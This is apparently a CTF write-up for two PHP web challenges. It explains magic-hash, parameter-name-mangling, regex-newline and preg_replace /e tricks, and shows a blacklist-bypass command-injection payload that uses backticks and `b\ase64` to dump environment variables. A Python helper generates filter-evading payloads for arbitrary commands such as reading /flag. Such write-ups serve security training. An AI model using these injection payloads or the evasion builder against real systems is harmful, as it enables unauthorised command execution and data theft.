How each check is passed: the POST values a/b are 0e magic hashes, so md5($a)==md5($b) holds loosely while $a!=$b. The parameter name A_a_B.b cannot be sent literally, because PHP turns "." in a parameter name into "_"; A[a_B.b works instead, since an unmatched "[" becomes "_" and the rest of the name is kept. /^nihao$/ without the D modifier also matches "nihao\n", which is != 'nihao'. c[] makes $c an array: preg_match() returns false on an array (so no digit is "found") and intval() of a non-empty array is 1. Finally preg_replace() with the /e modifier evaluates the replacement as PHP, so the "test" in $_GET['c'] is replaced by the result of system('cat flag'). The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this target was running PHP 5.

xxxxxxxxx
<?php
show_source(__FILE__);
$man=$_GET['m_a.n'];
$damn=$_POST['DDDaaammmnnn'];
if (isset($damn)&&isset($man)&&!preg_match('/\\$|\!|\@|\#|\%|\\|\/|\^|\&|\?|\{|\}|\>|\<|nc|tee|sort|wget|php|n|l|nl|exec|bash|sh|netcat|find|flag|grep|base64|curl|wget|gcc|python|ping|touch|mv|mkdir|rm|cat|tac|cp|na|nt|strlen|info|path|bin|hex/i',$damn)){
    system($damn);
}
else{
    echo '不准打我';
} 

GET: ?m[a.n=

PHP rewrites "." in a parameter name to "_", so m_a.n can never be received as written; an unmatched "[" is converted to "_" instead and everything after it is left alone, so m[a.n arrives as m_a.n. The value may be empty; only isset() is tested.

POST:

DDDaaammmnnn=`echo ZW52|b\ase64 -d`

The blacklist bans the letters n and l, so env, ls and cat are out, but it does not ban backticks or a lone backslash, and the intended \\ and \/ alternatives reach PCRE as \|\/ after single-quote escaping, i.e. only the two-character sequence |/ is matched. ZW52 is base64 for env, and the backslash in b\ase64 splits the banned word. export contains no banned substring and also lists the environment:

DDDaaammmnnn=export

The flag is in an environment variable.
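
Added example covering both ezphp and this challenge (not code from the writeup): an emulation of how PHP rewrites request parameter names, which is why A[a_B.b and m[a.n arrive as A_a_B.b and m_a.n while the literal names would not; the "$ matches before a trailing newline" regex check; and the blacklist above as PCRE actually receives it, plus a builder that hides an arbitrary command inside the echo|b\ase64 wrapper. Because the base64 text itself may contain a banned letter (n or l), the builder inserts extra spaces at word boundaries until the encoding is clean, which generalizes the env trick to commands such as cat /flag. The emulation of PHP's name mangling only covers the cases these two challenges use; a well-formed [index] is returned unchanged.

```python
import base64
import re


def php_query_name(raw: str) -> str:
    """How PHP rewrites a request parameter name (php_register_variable_ex):
    leading spaces are dropped; up to the first '[' every '.' and ' ' becomes
    '_'; if that '[' has no matching ']' it is itself replaced by '_' and the
    remainder is kept verbatim.  A well-formed [index] is returned unchanged
    here (PHP would build an array); neither challenge needs that path."""
    raw = raw.lstrip(" ")
    head, bracket, tail = raw.partition("[")
    head = head.replace(".", "_").replace(" ", "_")
    if not bracket:
        return head
    if "]" in tail:
        return head + "[" + tail
    return head + "_" + tail


def passes_nihao(value: str) -> bool:
    """preg_match('/^nihao$/') && value != 'nihao': without the D modifier
    PCRE's $ (like Python's) also matches before one trailing newline."""
    return re.match(r"^nihao$", value) is not None and value != "nihao"


# The blacklist of the second challenge as PCRE receives it.  In a PHP
# single-quoted string only \\ and \' are escapes, so the source's  \\|\/
# reaches PCRE as  \|\/  : an escaped pipe followed by a slash, i.e. the
# two-character sequence "|/".  A lone backslash or slash is NOT blocked,
# which is why b\ase64 gets through.
BLACKLIST = re.compile(
    r"\$|\!|\@|\#|\%|\|\/|\^|\&|\?|\{|\}|\>|\<|nc|tee|sort|wget|php|n|l|nl|exec|bash|sh|"
    r"netcat|find|flag|grep|base64|curl|wget|gcc|python|ping|touch|mv|mkdir|rm|cat|tac|cp|"
    r"na|nt|strlen|info|path|bin|hex",
    re.I,
)


def passes_blacklist(command: str) -> bool:
    return BLACKLIST.search(command) is None


def encode_for_filter(command: str, max_pad: int = 8):
    """Wrap `command` as `echo <base64>|b\\ase64 -d` so the banned words stay
    inside the encoding.  The base64 text itself must not contain n or l
    (case-insensitive); if it does, insert extra spaces at the command's
    word boundaries, which shifts the 3-byte alignment and changes the
    characters used, until a clean encoding appears.  None if none is found."""
    spots = [0, len(command)] + [i for i, ch in enumerate(command) if ch == " "]
    for pad in range(max_pad + 1):
        for i in spots:
            candidate = command[:i] + " " * pad + command[i:]
            b64 = base64.b64encode(candidate.encode()).decode()
            payload = f"`echo {b64}|b\\ase64 -d`"
            if passes_blacklist(payload):
                return payload
    return None


def decoded_command(payload: str) -> str:
    """Recover the command hidden in an encode_for_filter() payload (spaces collapsed)."""
    b64 = re.search(r"echo (\S+)\|", payload).group(1)
    return " ".join(base64.b64decode(b64).decode().split())


if __name__ == "__main__":
    print(php_query_name("A[a_B.b"), php_query_name("m[a.n"), php_query_name("m_a.n"))
    print(passes_nihao("nihao\n"), passes_nihao("nihao"))
    for cmd in ("env", "export", "cat /flag"):
        print(cmd, "->", encode_for_filter(cmd))
```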
